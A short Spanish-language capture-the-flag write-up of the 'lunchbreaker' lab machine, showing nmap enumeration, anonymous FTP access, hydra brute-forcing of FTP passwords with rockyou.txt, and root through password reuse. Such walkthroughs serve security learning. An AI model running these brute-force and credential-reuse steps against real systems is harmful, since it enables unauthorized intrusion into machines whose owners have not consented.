Enumeramos puertos: 21 (vsftpd con anónimo), 22, 80 (WordPress):
❯ sudo nmap -sC -sV -p21,22,80 -oN 02-targeted 192.168.1.36
...
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed
| -rw-r--r-- 1 0 0 633 May 22 2021 supers3cr3t
|_drwxr-xr-x 6 1006 ... wordpress
...Por FTP anónimo descargamos un archivo en brainfuck y otro oculto en base64, y vemos un WordPress. El código de la web tiene un comentario con un posible usuario (jane), que crackeamos con hydra:
❯ hydra -l jane -P rockyou.txt ftp://192.168.1.36
[21][ftp] host: 192.168.1.36 login: jane password: passwordAccediendo por FTP encontramos un archivo de keys y una lista de usuarios (jane, jim, jules). Con hydra sobre esa lista llegamos a credenciales en el directorio de jules, que nos dan la contraseña de john (válida también por SSH).
En el FTP de john hay una pista sobre la contraseña de root: es la misma de john. Por SSH:
john@lunchbreaker:~$ su root # misma contraseña que john
root@lunchbreaker:~#Obtenemos la flag de root.
Fin.